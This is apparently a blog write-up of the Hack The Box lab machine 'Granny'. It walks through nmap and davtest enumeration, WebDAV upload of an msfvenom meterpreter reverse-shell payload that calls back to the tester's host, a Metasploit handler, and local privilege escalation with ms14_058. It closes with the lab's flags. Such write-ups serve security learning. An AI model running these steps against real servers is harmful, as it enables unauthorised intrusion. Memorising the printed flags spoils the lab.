GRANNY 10.10.10.15 Write Up
Machine Created by ch4pTools Used for Enumeration:
1. nmap2. davtest
Tools Used for Exploitation:
1. metasploitSteps for primary enumeration:
1. At first we use nmap (Network Mapping tool) to scan the box ip. When we run it we got list of some open ports and services running on those ports. On the granny box we can see, open port and service is, port 80 for Microsoft IIS httpd 6.0.Command used: nmap -A 10.10.10.15
2. Opening the site in browser, it shows a default under construction IIS page (webDAV).
Steps to get user.txt:
1. nmap scan showed that put method is allowed in webdav.2. We can use davtest tool to check allowed file types. Command used: davtest -url http://10.10.10.15
3. We can create a metsploit reverse shell payload to upload with command "msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.21 LPORT=1337 -f aspx > zishan.aspx". Then we can upload the file with command "curl -X PUT http://10.10.10.15/zishan.txt --data-binary @zishan.aspx". Then move the text file to executable with command "curl -X MOVE -H 'Destination: https://10.10.10.15/zishan.aspx' https://10.10.10.15/zishan.txt".
4. Now we can listen with metasploit module "exploit/multi/handler", proper lhost, proper lport and payload "windows/meterpreter/reverse_tcp". Opening uploaded shell with command "curl http://10.10.10.15/zishan.aspx" to get shell.
5. We can get local exploits using module "post/multi/recon/local_exploit_suggester" and by setting up proper localhost and session.
6. By testing a working module from suggestion we can get a system privileged shell to the machine. Module used: exploit/windows/local/ms14_058_track_popup_menu
7. Now we can get user.txt by using command "cat 'C:\Documents and Settings\Lakis\Desktop\user.txt'".
Steps to get root.txt:
1.We can get root hash by typing "cat 'C:\Documents and Settings\Administrator\Desktop\root.txt'" command.Flags:
1. user.txt flag: 700c5dc163014e22b3e408f8703f67d12. root.txt flag: aa4beed1c0584445ab463a6747bd06e9
No comments:
Post a Comment